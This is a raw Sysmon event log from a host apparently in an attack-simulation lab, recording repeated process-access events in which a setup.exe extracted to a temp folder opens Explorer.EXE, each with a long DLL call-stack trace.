13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015704Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015703Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015702Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.724{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wo